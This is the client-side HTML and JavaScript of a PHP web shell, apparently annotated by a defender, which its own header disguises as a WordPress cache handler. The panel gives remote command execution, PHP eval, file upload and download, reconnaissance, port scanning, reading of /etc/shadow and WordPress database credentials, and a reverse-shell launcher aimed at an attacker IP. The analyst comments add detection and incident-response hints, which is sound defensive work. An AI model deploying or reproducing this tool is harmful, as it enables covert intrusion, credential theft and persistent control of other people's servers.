.lm button{width:100%;padding:9px;background:var(--neon);color:#000;border:none;cursor:pointer;font:700 11px 'JetBrains Mono',monospace;border-radius:3px;letter-spacing:1px}.lm button:hover{background:#00cc50}
</style></head>
<body>
<div class="app">
<div id="bar"></div>
<div class="hd">
<div class="logo">PX<span>5</span></div>
<div class="tabs">
<div class="tab on" onclick="switchTab(this,'files')"><i class="fa fa-folder-open fa-xs"></i> FILES</div>
<div class="tab" onclick="switchTab(this,'term')"><i class="fa fa-terminal fa-xs"></i> SHELL</div>
<div class="tab" onclick="switchTab(this,'php')"><i class="fa fa-code fa-xs"></i> PHP</div>
<div class="tab" onclick="switchTab(this,'info')"><i class="fa fa-server fa-xs"></i> INFO</div>
<div class="tab" onclick="switchTab(this,'tools')"><i class="fa fa-wrench fa-xs"></i> TOOLS</div>
</div>
<div class="hdr" onclick="doLogout()" title="Logout"><i class="fa fa-sign-out-alt"></i></div>
</div>
<div class="panels">
<!-- FILES -->
<div class="panel on" id="p-files">
<div class="fnav">
<div class="bc" id="bc"></div>
<button class="btn" onclick="mkDir()"><i class="fa fa-folder-plus"></i></button>
<button class="btn" onclick="showOv('upOv')"><i class="fa fa-upload"></i> Up</button>
<button class="btn" onclick="ls()"><i class="fa fa-sync-alt"></i></button>
</div>
<div class="fg">
<table>
<thead><tr>
<th style="color:var(--neon)">ENTITY</th>
<th>SIZE</th><th>MTIME</th><th>MODE</th>
<th style="text-align:right">ACTIONS</th>
</tr></thead>
<tbody id="tb"></tbody>
</table>
</div>
</div>
<!-- SHELL -->
<div class="panel" id="p-term">
<div class="trm">
<div class="to" id="to"></div>
<div class="ti">
<div class="tp" id="tp">$ </div>
<input class="tc" id="tc" placeholder="enter command..." onkeydown="termKd(event)" autocomplete="off">
</div>
</div>
</div>
<!-- PHP -->
<div class="panel" id="p-php">
<div class="pp">
<div class="pl">
<div class="lbl">PHP CODE <span style="color:#222">// eval in cwd</span></div>
<textarea class="ce" id="phpcode" placeholder="echo phpinfo(); var_dump(getcwd()); "></textarea>
<div style="display:flex;gap:6px;justify-content:flex-end;flex-shrink:0">
<button class="btn" onclick="clrPHP()">Clear</button>
<button class="btn" style="border-color:rgba(0,255,100,.3);color:var(--neon)" onclick="runPHP()"><i class="fa fa-play"></i> Run</button>
</div>
</div>
<div class="pr">
<div class="lbl">OUTPUT</div>
<div class="ob" id="phpout"></div>
</div>
</div>
</div>
<!-- INFO -->
<div class="panel" id="p-info">
<div class="ip" id="infoC"><div style="color:#222;text-align:center;padding:50px;font-size:11px">Loading system info...</div></div>
</div>
<!-- TOOLS -->
<div class="panel" id="p-tools">
<div class="tp2">
<div class="tc2">
<h3><i class="fa fa-network-wired"></i> NETWORK</h3>
<div class="fbr">
<button class="btn" onclick="net('iface')">Interfaces</button>
<button class="btn" onclick="net('ports')">Ports</button>
</div>
<input class="fi" id="nH" value="8.8.8.8" placeholder="host / URL">
<input class="fi" id="nP" value="80,443,22,21,3306,8080" placeholder="ports for scan">
<div class="fbr">
<button class="btn" onclick="net('ping')">Ping</button>
<button class="btn" onclick="net('curl')">cURL</button>
<button class="btn" onclick="net('scan')">Scan</button>
</div>
<div class="tco" id="netOut"></div>
</div>
<div class="tc2">
<h3><i class="fa fa-user-secret"></i> PRIV ESC</h3>
<div class="fbr">
<button class="btn" style="border-color:rgba(0,212,255,.3);color:var(--c2)" onclick="pe('scan')">Quick Scan</button>
<button class="btn" onclick="pe('suid')">SUID</button>
<button class="btn" onclick="pe('sudo')">Sudo</button>
<button class="btn" onclick="pe('cap')">Caps</button>
<button class="btn" onclick="pe('cron')">Cron</button>
<button class="btn" onclick="pe('env')">Env</button>
<button class="btn" onclick="pe('writable')">Writable</button>
<button class="btn" onclick="pe('passwd')">/etc/passwd</button>
<button class="btn" onclick="pe('shadow')">/etc/shadow</button>
<button class="btn" onclick="pe('wpass')">WP Creds</button>
</div>
<div class="tco" id="peOut"></div>
</div>
<div class="tc2">
<h3><i class="fa fa-plug"></i> REVERSE SHELL</h3>
<input class="fi" id="rsIp" placeholder="Your IP (attacker)">
<input class="fi" id="rsPort" value="4444" placeholder="Port">
<select class="fi" id="rsType">
<option value="bash">Bash</option>
<option value="python">Python3</option>
<option value="perl">Perl</option>
<option value="nc">Netcat (mkfifo)</option>
<option value="nc2">Netcat (-e)</option>
<option value="php">PHP</option>
<option value="ruby">Ruby</option>
<option value="socat">Socat</option>
</select>
<div class="fbr">
<button class="btn" onclick="genRS(false)">Generate</button>
<button class="btn" style="border-color:#ff8c00;color:#ff8c00" onclick="genRS(true)">Execute on target</button>
</div>
<div class="tco" id="rsOut"></div>
</div>
<div class="tc2">
<h3><i class="fa fa-database"></i> WORDPRESS</h3>
<div class="fbr">
<button class="btn" onclick="wp('find')">Find WP</button>
<button class="btn" onclick="wp('creds')">DB Creds</button>
</div>
<div class="tco" id="wpOut"></div>
</div>
</div>
</div>
</div><!-- .panels -->
</div><!-- .app -->
<?php echo $_pxc; ?>
<!-- LOGIN OVERLAY -->
<div class="ov on" id="loginOv">
<div class="mo lm">
<h2>// ACCESS REQUIRED</h2>
<input type="password" id="lk" placeholder="password" onkeydown="if(event.key==='Enter')doLogin()" autofocus>
<button onclick="doLogin()"><i class="fa fa-unlock-alt"></i> AUTHENTICATE</button>
<div id="le" style="color:var(--rd);font-size:10px;margin-top:8px;min-height:14px"></div>
</div>
</div>
<!-- EDITOR OVERLAY -->
<div class="ov" id="edOv">
<div class="mo">
<div class="mor">
<span id="edN" style="color:var(--c2);font-size:11px"></span>
<span style="cursor:pointer;color:#333;font-size:18px;line-height:1" onclick="closeOv('edOv')">×</span>
</div>
<textarea class="ce" id="edC" style="height:440px;width:100%"></textarea>
<div style="margin-top:9px;text-align:right">
<button class="btn" onclick="saveFile()"><i class="fa fa-save"></i> Save</button>
</div>
</div>
</div>
<!-- UPLOAD OVERLAY -->
<div class="ov" id="upOv">
<div class="mo" style="max-width:370px;text-align:center">
<div class="mor"><h3>UPLOAD FILE</h3><span style="cursor:pointer;color:#333;font-size:18px;line-height:1" onclick="closeOv('upOv')">×</span></div>
<input type="file" id="upF" style="display:none" onchange="doUpload()">
<button class="btn" style="padding:18px 36px;border-style:dashed;font-size:12px" onclick="document.getElementById('upF').click()">
<i class="fa fa-cloud-upload-alt"></i> Select File
</button>
<div id="upS" style="margin-top:11px;font-size:10px;color:var(--neon)">ready</div>
</div>
</div>
<script>
let CWD='<?php echo _hx(@getcwd()?:'/'); ?>';
let _HIST=[],_HI=0,_EDF='';
function h2s(h){let s='';for(let i=0;i<h.length;i+=2)s+=String.fromCharCode(parseInt(h.substr(i,2),16));return s;}
function s2h(s){let h='';for(let i=0;i<s.length;i++)h+=s.charCodeAt(i).toString(16).padStart(2,'0');return h;}
function h2b(h){const b=new Uint8Array(h.length/2);for(let i=0;i<h.length;i+=2)b[i/2]=parseInt(h.substr(i,2),16);return b;}
// Client half of the wire protocol: sets t.d to the current directory, serialises the request to JSON,
// hex-encodes it character by character and POSTs it to the page's own URL as the form field "_r".
// The parsed JSON reply is returned; a fetch or parse failure is reported as {ok:false,e:'network'}.
// Because FormData is used, the request goes out as multipart/form-data with that one hexadecimal field.
async function api(t){
const bar=document.getElementById('bar');bar.style.width='65%';
t.d=CWD;
const j=JSON.stringify(t);let h='';for(let i=0;i<j.length;i++)h+=j.charCodeAt(i).toString(16).padStart(2,'0');
const fd=new FormData();fd.append('_r',h);
try{
const r=await(await fetch('',{method:'POST',body:fd})).json();
bar.style.width='100%';setTimeout(()=>bar.style.width='0',180);return r;
}catch(e){bar.style.width='0';return{ok:false,e:'network'};}
}
// ── AUTH ──────────────────────────────────────────────────────────────────────
async function checkAuth(){const r=await api({a:'ping'});if(r.ok){closeOv('loginOv');ls();}}
// Sends the typed password as the 'k' field of an 'auth' request through api().
// It therefore travels inside the hex-encoded JSON and does not appear as a readable form value in request captures.
// On success the login overlay is closed and the file listing loads; on failure the field is cleared and an error is shown.
async function doLogin(){
const k=document.getElementById('lk').value;
const r=await api({a:'auth',k});
if(r.ok){closeOv('loginOv');ls();}
else{document.getElementById('le').textContent='[ access denied ]';document.getElementById('lk').value='';}
}
async function doLogout(){if(!confirm('Logout?'))return;await api({a:'logout'});location.reload();}
// ── TABS ──────────────────────────────────────────────────────────────────────
function switchTab(el,id){
document.querySelectorAll('.tab').forEach(t=>t.classList.remove('on'));
document.querySelectorAll('.panel').forEach(p=>p.classList.remove('on'));
el.classList.add('on');document.getElementById('p-'+id).classList.add('on');
if(id==='info')loadInfo();
}
// ── FILES ─────────────────────────────────────────────────────────────────────
async function ls(){
const r=await api({a:'ls'});if(!r.ok)return;
CWD=r.cwd;
let bc='<span onclick="nav(\''+s2h('/')+'\')" style="color:var(--neon)">⌂</span>';
(r.bc||[]).forEach(b=>bc+=`<span class="sep">/</span><span onclick="nav('${b.x}')">${h2s(b.n)}</span>`);
document.getElementById('bc').innerHTML=bc;
document.getElementById('tp').textContent=h2s(CWD)+' $ ';
let html='';
(r.d||[]).forEach(d=>{
html+=`<tr><td><a href="#" onclick="nav('${d.x}')" style="color:#ddd;text-decoration:none"><i class="fa fa-folder ico" style="color:var(--neon)"></i>${h2s(d.n)}</a></td><td style="color:#1e1e1e">DIR</td><td style="color:#1e1e1e">${d.t}</td><td><span class="badge">${d.p}</span></td><td style="text-align:right"><i class="fa fa-pen" onclick="renF('${s2h(d.n)}')" style="color:#2a2a2a;cursor:pointer;margin-right:8px"></i><i class="fa fa-trash" onclick="delF('${s2h(d.n)}')" style="color:var(--rd);cursor:pointer;opacity:.5"></i></td></tr>`;
});
(r.f||[]).forEach(f=>{
let ic='fa-file',cc='#3a3a3a';
if(f.e==='php'){ic='fa-php';cc='#a78bfa';}
else if(['png','jpg','jpeg','gif','webp','svg'].includes(f.e)){ic='fa-image';cc='#f59e0b';}
else if(['txt','log','md','conf','cfg','ini','env'].includes(f.e)){ic='fa-file-alt';cc='#60a5fa';}
else if(['zip','gz','tar','rar','7z'].includes(f.e)){ic='fa-file-archive';cc='#34d399';}
else if(['sh','py','rb','pl','js'].includes(f.e)){ic='fa-file-code';cc='#f87171';}
html+=`<tr><td><i class="fa ${ic} ico" style="color:${cc}"></i>${h2s(f.n)}</td><td style="color:#2a2a2a">${f.s}</td><td style="color:#1e1e1e">${f.t}</td><td><span class="badge">${f.p}</span></td><td style="text-align:right"><i class="fa fa-code" onclick="editF('${s2h(f.n)}')" style="color:#666;cursor:pointer;margin-right:8px" title="Edit"></i><i class="fa fa-download" onclick="dlF('${s2h(f.n)}')" style="color:var(--c2);cursor:pointer;margin-right:8px;opacity:.7" title="Download"></i><i class="fa fa-pen" onclick="renF('${s2h(f.n)}')" style="color:#2a2a2a;cursor:pointer;margin-right:8px" title="Rename"></i><i class="fa fa-trash" onclick="delF('${s2h(f.n)}')" style="color:var(--rd);cursor:pointer;opacity:.5" title="Delete"></i></td></tr>`;
});
document.getElementById('tb').innerHTML=html||'<tr><td colspan="5" style="color:#1a1a1a;text-align:center;padding:28px;font-size:11px">[empty directory]</td></tr>';
}
function nav(hx){CWD=hx;ls();}
async function delF(hn){if(!confirm('Delete '+h2s(hn)+'?'))return;const r=await api({a:'rm',n:h2s(hn)});r.ok?ls():alert('Error deleting');}
async function renF(hn){const o=h2s(hn);const n=prompt('Rename:',o);if(!n||n===o)return;const r=await api({a:'rn',o,n});r.ok?ls():alert('Error renaming');}
async function mkDir(){const n=prompt('Directory name:');if(!n)return;const r=await api({a:'mk',n});r.ok?ls():alert('Error');}
async function editF(hn){
const n=h2s(hn);const r=await api({a:'rd',n});
if(!r.ok){alert('Cannot read: '+n);return;}
document.getElementById('edC').value=h2s(r.c);
document.getElementById('edN').textContent='// '+n;
_EDF=n;showOv('edOv');
}
async function saveFile(){
const c=document.getElementById('edC').value;
const r=await api({a:'wr',n:_EDF,c:s2h(c)});
r.ok?(closeOv('edOv'),ls()):alert('Save failed');
}
// Analyst note: file download (data-exfiltration path).
// Requests the file with {a:'dl', n}; the content arrives inside the api() response as r.c,
// is converted with h2b() into a Blob, and is saved in the operator's browser under the
// name h2s(r.n) via a temporary <a download> element.
// Because the content travels in the script's own response, the transfer would appear in
// web logs only as a request to this script, not to the file itself — look at response
// sizes for requests to the script when scoping what was taken.
async function dlF(hn){
const n=h2s(hn);const r=await api({a:'dl',n});
if(!r.ok){alert('Error downloading');return;}
const b=new Blob([h2b(r.c)],{type:'application/octet-stream'});
const a=document.createElement('a');a.href=URL.createObjectURL(b);a.download=h2s(r.n);a.click();
}
// Analyst note: chunked file upload to the server.
// Takes the first file selected in #upF, reads it in 65536-byte slices, converts each slice
// to a lowercase hex string and sends it as {a:'up', n:<file name>, d:<hex>, f:<first?>}.
// f is true only for the first chunk; presumably the server uses it to start a new file
// rather than append — TODO confirm against the server-side handler.
// Progress is written to #upS; after the loop the overlay is closed and the listing refreshed.
// Detection hint: the file never travels as a multipart upload, so it shows up instead as a
// series of requests to the same script carrying long hex-only parameter values.
async function doUpload(){
const file=document.getElementById('upF').files[0];if(!file)return;
let done=0,first=true;document.getElementById('upS').textContent='0%';
while(done<file.size){
const chunk=file.slice(done,done+65536);
// FileReader is wrapped in a Promise so the chunks are sent strictly one after another.
const ab=await new Promise(res=>{const fr=new FileReader();fr.onload=e=>res(e.target.result);fr.readAsArrayBuffer(chunk);});
// Two hex digits per byte: every chunk doubles in size on the wire.
const hex=Array.from(new Uint8Array(ab)).map(b=>b.toString(16).padStart(2,'0')).join('');
await api({a:'up',n:file.name,d:hex,f:first});
done+=65536;first=false;
document.getElementById('upS').textContent=Math.min(100,Math.round(done/file.size*100))+'%';
}
document.getElementById('upS').textContent='done!';
setTimeout(()=>{closeOv('upOv');ls();},700);
}
// ── SHELL ─────────────────────────────────────────────────────────────────────
// Analyst note: the panel's remote command console.
// Echoes the command into the #to output element, then:
//   - for input starting with "cd", sends {a:'cd', p:<path or '~'>} and, on success, stores
//     the returned directory in CWD and updates the prompt element #tp;
//   - for anything else, sends {a:'ex', cmd} and appends the h2s()-decoded r.out.
// The server-side handlers are outside this view. The PHP part of this file (earlier in the
// file) keeps function names such as exec, system, shell_exec, passthru, popen and proc_open
// as character arrays, which hides them from plain string searches.
// Defensive relevance: look for shell child processes spawned by the web server / PHP worker,
// and restrict command-execution functions in PHP's disable_functions where the site allows it.
async function runCmd(cmd){
const to=document.getElementById('to');
to.textContent+='$ '+cmd+'\n';
// "cd" is handled as its own action so the working directory persists between requests.
if(/^cd(\s|$)/.test(cmd)){
const path=cmd.replace(/^cd\s*/,'').trim()||'~';
const r=await api({a:'cd',p:path});
if(r.ok){CWD=r.cwd;document.getElementById('tp').textContent=h2s(CWD)+' $ ';to.textContent+=h2s(CWD)+'\n';}
else to.textContent+='cd: no such file or directory\n';
}else{
const r=await api({a:'ex',cmd});
// A response without ok is dropped silently: nothing is appended to the output.
if(r.ok){to.textContent+=h2s(r.out)||'';CWD=r.cwd;document.getElementById('tp').textContent=h2s(CWD)+' $ ';}
}
to.scrollTop=to.scrollHeight;
}
// Keydown handler for the console input #tc.
// Enter: trims the input, ignores it if empty, pushes it to the front of the global history
// array _HIST, resets the history index _HI, clears the field and calls runCmd().
// ArrowUp / ArrowDown: step through _HIST (newest first) and put the entry into the field.
// The history lives only in page memory; nothing here persists it.
function termKd(e){
const el=document.getElementById('tc');
if(e.key==='Enter'){const cmd=el.value.trim();if(!cmd)return;_HIST.unshift(cmd);_HI=0;el.value='';runCmd(cmd);}
else if(e.key==='ArrowUp'){e.preventDefault();if(_HI<_HIST.length)el.value=_HIST[_HI++];}
else if(e.key==='ArrowDown'){e.preventDefault();_HI=Math.max(0,_HI-1);el.value=_HIST[_HI]||'';}
}
// ── PHP EVAL ──────────────────────────────────────────────────────────────────
// Analyst note: sends operator-supplied PHP source to the server.
// Reads the #phpcode textarea and sends it as {a:'ev', code}; shows the h2s()-decoded r.out
// in #phpout, or '[error]' when the response lacks ok.
// How the server runs the code is outside this view; the section banner calls it "PHP EVAL".
// Defensive relevance: this gives code execution inside the PHP process itself, without any
// child process, so process-creation monitoring alone will not see it — request logging for
// the script and file-integrity checks are needed as well.
async function runPHP(){
const code=document.getElementById('phpcode').value;
const r=await api({a:'ev',code});
document.getElementById('phpout').textContent=r.ok?h2s(r.out):'[error]';
}
// Clears the PHP input textarea (#phpcode) and its output element (#phpout). Client-side only.
function clrPHP(){document.getElementById('phpcode').value='';document.getElementById('phpout').textContent='';}
// ── INFO ──────────────────────────────────────────────────────────────────────
// Analyst note: host reconnaissance view.
// Requests {a:'info'} and renders the returned object r.i into #infoC: OS, PHP version and
// SAPI, user, server software, IP and port, working directory, document root, the path of
// this script (shown under the label "Shell"), memory and disk figures, PHP's disabled
// functions and the loaded extensions.
// The "DISABLED FUNCTIONS" card shows the text '(none — fully featured)' when the list is
// empty, i.e. the tool checks how far PHP has been hardened.
// All fields except i.file are interpolated into the markup as received.
async function loadInfo(){
const r=await api({a:'info'});
if(!r.ok){document.getElementById('infoC').innerHTML='<div style="color:#222;text-align:center;padding:50px">failed to load</div>';return;}
// r.i is the info object built by the server-side handler (not visible in this view).
const i=r.i;
document.getElementById('infoC').innerHTML=`<div class="ig">
<div class="cd"><h3>SYSTEM</h3>
<div class="kv"><span class="k">OS</span><span class="v">${i.os}</span></div>
<div class="kv"><span class="k">PHP</span><span class="v">${i.php} (${i.sapi})</span></div>
<div class="kv"><span class="k">User</span><span class="v">${i.user}</span></div>
<div class="kv"><span class="k">Server</span><span class="v">${i.srv}</span></div>
<div class="kv"><span class="k">IP:Port</span><span class="v">${i.ip}:${i.port}</span></div>
</div>
<div class="cd"><h3>PATHS</h3>
<div class="kv"><span class="k">CWD</span><span class="v">${i.cwd}</span></div>
<div class="kv"><span class="k">DocRoot</span><span class="v">${i.doc}</span></div>
<div class="kv"><span class="k">Shell</span><span class="v">${h2s(i.file)}</span></div>
</div>
<div class="cd"><h3>RESOURCES</h3>
<div class="kv"><span class="k">Memory</span><span class="v">${i.mem}</span></div>
<div class="kv"><span class="k">Disk Free</span><span class="v">${i.df}</span></div>
<div class="kv"><span class="k">Disk Total</span><span class="v">${i.dt}</span></div>
</div>
<div class="cd" style="grid-column:1/-1"><h3>DISABLED FUNCTIONS</h3>
<div style="font-size:10px;color:${i.disable?'#f87171':'var(--neon)'};line-height:1.8">${i.disable||'(none — fully featured)'}</div>
</div>
<div class="cd" style="grid-column:1/-1"><h3>LOADED EXTENSIONS</h3>
<div style="font-size:10px;color:#2a2a2a;word-break:break-all;line-height:1.9">${i.ext}</div>
</div>
</div>`;
}
// ── TOOLS ─────────────────────────────────────────────────────────────────────
// Analyst note: front end for the panel's network tools.
// Reads a host from #nH and a port from #nP and sends {a:'net', s:sub, h, u:h, p}; the same
// input value is sent as both h and u. The h2s()-decoded r.out is shown in #netOut.
// Which sub-actions exist and what they do is decided server-side and is not visible here.
// Defensive relevance: any connection made by these tools originates from the web server,
// so unexpected outbound or internal connections from that host are the thing to look for.
async function net(sub){
const h=document.getElementById('nH').value;
const p=document.getElementById('nP').value;
const r=await api({a:'net',s:sub,h,u:h,p});
document.getElementById('netOut').textContent=h2s(r.out||'');
}
// Sends {a:'pe', s:sub} and shows the h2s()-decoded r.out in #peOut.
// NOTE(review): 'pe' is not expanded anywhere in this view; presumably local
// privilege-escalation checks — confirm against the server-side handler.
async function pe(sub){
const r=await api({a:'pe',s:sub});
document.getElementById('peOut').textContent=h2s(r.out||'');
}
// Analyst note: reverse-shell helper.
// Reads an address (#rsIp), a port (#rsPort) and a type (#rsType) and sends
// {a:'rs', ip, port, t, run}; the h2s()-decoded r.cmd is shown in #rsOut.
// When run is truthy the operator must first accept the prompt 'Execute reverse shell on
// target?'; with run false only the command text is requested.
// Defensive relevance: a web server has little reason to open outbound connections to
// arbitrary hosts and ports, so default-deny egress filtering and alerting on such
// connections from the web tier both limit and reveal use of this feature.
async function genRS(run){
if(run&&!confirm('Execute reverse shell on target?'))return;
const ip=document.getElementById('rsIp').value;
const port=document.getElementById('rsPort').value;
const t=document.getElementById('rsType').value;
const r=await api({a:'rs',ip,port,t,run:!!run});
document.getElementById('rsOut').textContent=h2s(r.cmd||'');
}
// Analyst note: WordPress-specific helpers.
// Sends {a:'wp', s:sub} and formats the answer for #wpOut:
//   - 'find'  : prints the WordPress root from r.root, else r.e or 'Not found';
//   - 'creds' : when r.db is present, prints every key/value pair of r.db, one per line;
//   - other   : prints r.e, or the whole response as indented JSON.
// r.db presumably holds the database settings read from the site's configuration — TODO
// confirm against the server-side handler.
// Incident response: if this file was reachable, treat the WordPress database credentials
// as disclosed and rotate them, together with any other secrets stored next to them.
async function wp(sub){
const r=await api({a:'wp',s:sub});
let out='';
if(sub==='find')out=r.root?'WordPress root: '+h2s(r.root):(r.e||'Not found');
else if(sub==='creds'&&r.db)out=Object.entries(r.db).map(([k,v])=>k+': '+v).join('\n');
else out=r.e||JSON.stringify(r,null,2);
document.getElementById('wpOut').textContent=out;
}
// ── OVERLAY UTILS ─────────────────────────────────────────────────────────────
// Shows an overlay by adding the CSS class 'on' to the element with the given id.
function showOv(id){document.getElementById(id).classList.add('on');}
// Hides an overlay by removing the CSS class 'on' from the element with the given id.
function closeOv(id){document.getElementById(id).classList.remove('on');}
// Escape closes every open overlay except #loginOv, so the login overlay cannot be
// dismissed from the keyboard.
document.addEventListener('keydown',e=>{if(e.key==='Escape')document.querySelectorAll('.ov.on:not(#loginOv)').forEach(o=>o.classList.remove('on'));});
// ── START ─────────────────────────────────────────────────────────────────────
// Entry point of the page script. checkAuth() is defined outside this view; together with
// the #loginOv overlay it suggests the panel is gated by its own login — TODO confirm.
// Analyst note: the file's header comment presents it as a "WordPress Transient Cache
// Handler", while this script drives a file manager, command console and PHP runner.
checkAuth();
</script>
</body>
</html>